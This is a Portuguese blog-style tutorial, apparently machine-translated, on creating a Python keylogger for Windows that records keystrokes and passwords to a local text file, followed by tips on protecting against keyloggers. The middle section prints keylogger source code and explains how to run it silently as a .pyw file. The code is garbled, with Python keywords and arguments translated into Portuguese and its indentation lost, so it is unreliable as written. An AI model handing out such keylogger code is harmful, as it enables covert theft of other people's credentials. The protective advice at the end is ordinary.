Como criar um keylogger e registrar senhas no Windows

8 de janeiro de 2022 Matt Mills Como 0

Keyloggers são um tipo de ferramenta que os hackers usam para roubar senhas. É mais uma das muitas ameaças que existem na rede. No entanto, sua criação não é nada complexa. Basta ter o conhecimento necessário e uma série de aplicações. Dessa forma, você poderá testar suas chaves e estar preparado para um ataque real no qual eles podem quebrar suas chaves. Vamos explicar como você pode fazer isso.

Como funciona um keylogger

criar um keylogger e registrar senhas no Windows

A missão desse tipo de malware é registrar todas as chaves que pressionamos no teclado. Dessa forma, toda vez que entramos no e-mail, Facebook ou qualquer outro serviço, o programa irá gravar o que estamos colocando e assim roubar o código de acesso e nome de usuário.

Podemos dizer que um keylogger é uma das ferramentas de malware mais antigas. Embora hoje em dia os antivírus sejam capazes de detectar a maioria deles, a verdade é que os hackers continuam aperfeiçoando suas técnicas e conseguem atingir mais vítimas tanto em computadores quanto em dispositivos móveis.

É geralmente escondido em um arquivo que baixamos pela Internet, um aplicativo que instalamos e similares. Ele é executado em segundo plano em nosso sistema, sem que realmente saibamos que está funcionando e enquanto grava todas as teclas. Isso pode ser enviado posteriormente para um servidor controlado pelos invasores.

Este keylogger pode até ser projetado exclusivamente para gravar senhas no nível do sistema e são armazenados no próprio computador. Se for uma equipe compartilhada, outra pessoa poderá ver quais são as chaves.

Passos para criar um

Vamos explicar como podemos criar um keylogger localmente , para testar nossas senhas. Criar um remotamente é mais completo. O que vamos fazer é gravar as teclas do nosso computador. Tenha em mente que devemos fazer isso apenas para uso pessoal, para testar nossas próprias senhas e não afetar terceiros que possam usar esse equipamento.

Open Notepad

A primeira coisa que temos que fazer é abrir o Windows Bloco de notas ou qualquer outro aplicativo onde possamos escrever em texto simples. Até o próprio editor Python serviria. Nesse documento que criamos, devemos escrever o seguinte código:

</pre>
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location

file_log = 'keyloggeroutput.txt'

def OnKeyboardEvent (evento):
logging.basicConfig (nome do arquivo = arquivo_log, nível = logging.DEBUG, formato = '% (mensagem) s')
chr (evento.Ascii)
logging.log (10, chr (evento.Ascii))
retornar verdadeiro
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown=OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

Feito isso, a próxima coisa a fazer é salvar o arquivo em formato pyw . Por exemplo, podemos chamá-lo de Keylogger.pyw. Simplesmente com estes passos teremos nosso keylogger escrito em Python pronto. A partir desse momento, poderemos gravar todas as teclas digitadas no teclado do nosso equipamento. Tudo isso que você vai registrar será salvo em um documento separado.

código keylogger enviado

Baixe e instale o Python

Python deve ser instalado para funcionar. Se você não tiver instalado no Windows, você pode acessar o site oficial e baixar a versão mais recente. Atualmente é 3.10.1. Além disso, o PyHook e o Pywin32 precisam ser instalados para que funcionem sem problemas.

Quando o tivermos instalado e pronto para usar, teremos apenas que executar o arquivo que criamos anteriormente. Temos que ir para o caminho onde salvamos Keylogger.pyw (ou qualquer nome que gostaríamos de dar a ele) e clique duas vezes. A partir desse momento, ele começará a gravar qualquer pressionamento de tecla que fizermos.

Processo no Gerenciador de Tarefas

Se você quiser verificar se está funcionando corretamente ou não, basta ir ao Gerenciador de Tarefas do Windows . Para fazer isso, você deve pressionar a combinação de teclas Ctrl + Alt + Del e abri-lo lá. Todos os processos que estão em execução aparecerão e o que nos interessa neste caso é o pythow.exe.

Finalizar o processo do keylogger em python

Quando você quiser terminá-lo, tudo o que você precisa fazer é ir ao Gerenciador de Tarefas, clicar no processo e clicar em Concluir. Ele deixará de registrar automaticamente as teclas pressionadas no teclado e gerará um documento de texto no formato .txt. É aqui que tudo o que foi pressionado aparecerá.

Visualize o arquivo com as senhas

Para ver o arquivo de texto com todas as teclas que foi registrando (assim como qualquer pressionamento de tecla) temos que ir para o diretório onde o arquivo estava no formato .pyw, seja Keylogger.pyw ou qualquer nome que tenhamos colocado, e um arquivo de texto chamado keyloggeroutput. txt aparecerá lá.

Pulsações registradas keylogger

Uma vez aberto, veremos algo semelhante ao que aparece na imagem acima. Poderemos ver as chaves que vem registrando. É simples, ideal para poder testar as senhas que colocamos no Windows e ver até que ponto nossas chaves podem ser roubadas em caso de sofrer um ataque mais sofisticado que possam controlar remotamente.

Dicas para se proteger

Depois de ver como poderíamos criar um keylogger simples para usar em nível pessoal, em nosso computador, daremos algumas dicas para evitar ser vítima desse tipo de ataque. É essencial estarmos protegidos para que nossos códigos de acesso não pode ser roubado.

Programas de segurança

A primeira coisa é ter programas de segurança. UMA bom antivírus é essencial para evitar a entrada de vírus. Por exemplo, podemos nomear o próprio Windows Defender, Avast, Bitdefender ou qualquer outro. Existem muitas opções, mas devemos sempre escolher uma das garantias.

Além de um antivírus, também podemos ter outras aplicações como um firewall ou até mesmo add-ons para o navegador. Em todos os casos, eles ajudarão a aumentar a segurança e evitar conexões perigosas que podem ser usadas para ocultar keyloggers e outras ameaças.

Tenha tudo atualizado

Às vezes vulnerabilidades aparecem em sistemas . Existem falhas de segurança que afetam determinados aplicativos, como o navegador. Isso pode levar à entrada de malware e comprometer nossa privacidade. Para evitar isso, é essencial ter as versões mais recentes.

Segurança patches são usados ​​para corrigir esses problemas. Devemos ter atualizado o Windows, o navegador e qualquer programa que usamos. Até mesmo os drivers da placa de rede também devem estar atualizados, reduzindo assim o risco de problemas.

Use aplicativos oficiais

Claro, devemos sempre usar programas oficiais . É verdade que às vezes nos encontramos com a possibilidade de ter alguns aplicativos com funções extras, mas como não são oficiais, não sabemos se são garantias e de que maneira podem nos afetar.

Um hacker pode ter criado um programa que finge ser legítimo, mas na verdade é usado para roubar informações ou roubar um keylogger. Para evitar isso, devemos sempre baixar o software de lojas oficiais e páginas seguras.

Senso comum

Mais uma dica é manter o bom senso. É essencial para evite cometer erros , como baixar arquivos que chegam até nós por email sem verificar a identidade ou abrir links através de sites de terceiros, que podem ter sido criados apenas para roubar dados.

A maioria dos ataques ocorre com a interação do usuário. Mesmo keyloggers, que em muitos casos devem baixar um arquivo ou instalar um programa que baixamos anteriormente de uma página insegura.

Resumindo, criar um keylogger para uso pessoal é muito simples, como vimos. No entanto, um invasor pode criar uma senha mais sofisticada e roubar senhas remotamente. É essencial estar protegido e não cometer erros que possam nos afetar no nosso dia a dia.